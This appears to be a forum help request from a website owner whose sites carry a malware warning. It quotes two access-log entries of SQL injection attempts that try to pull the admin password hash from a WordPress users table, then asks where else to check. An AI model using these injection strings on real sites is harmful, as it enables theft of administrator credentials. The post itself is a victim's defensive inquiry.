I just figured i'd google my sites to see where they stand.... and omg I got the "This site may harm your computer" listed under my sites... all of them, so I began to trail through my access logs on the server. I found the following:
220.127.116.11 - - [31/Jan/2009:07:51:10 -0500] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 2698 "-" "Mozilla/4.0"
18.104.22.168 - - [31/Jan/2009:07:51:11 -0500] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 2698 "-" "Mozilla/4.0"
This is the only entry of its type throughout the whole access log. It seems that they're trying to pass sql through the index. I'm wondering if this is a security problem and where else I should check. Furthermore all sites associate with the "Phyrax" name have the same warning, even my site on deviantart... is it a link or something??? Anyone experienced in this thing?
OS - Linux 2.6.9-023stab048.6-smp
Version - psa v8.3.0_build83080131.20 os_CentOS 5
Type - Virtual Private Server
Host - 1and1 Hosting (U.S.)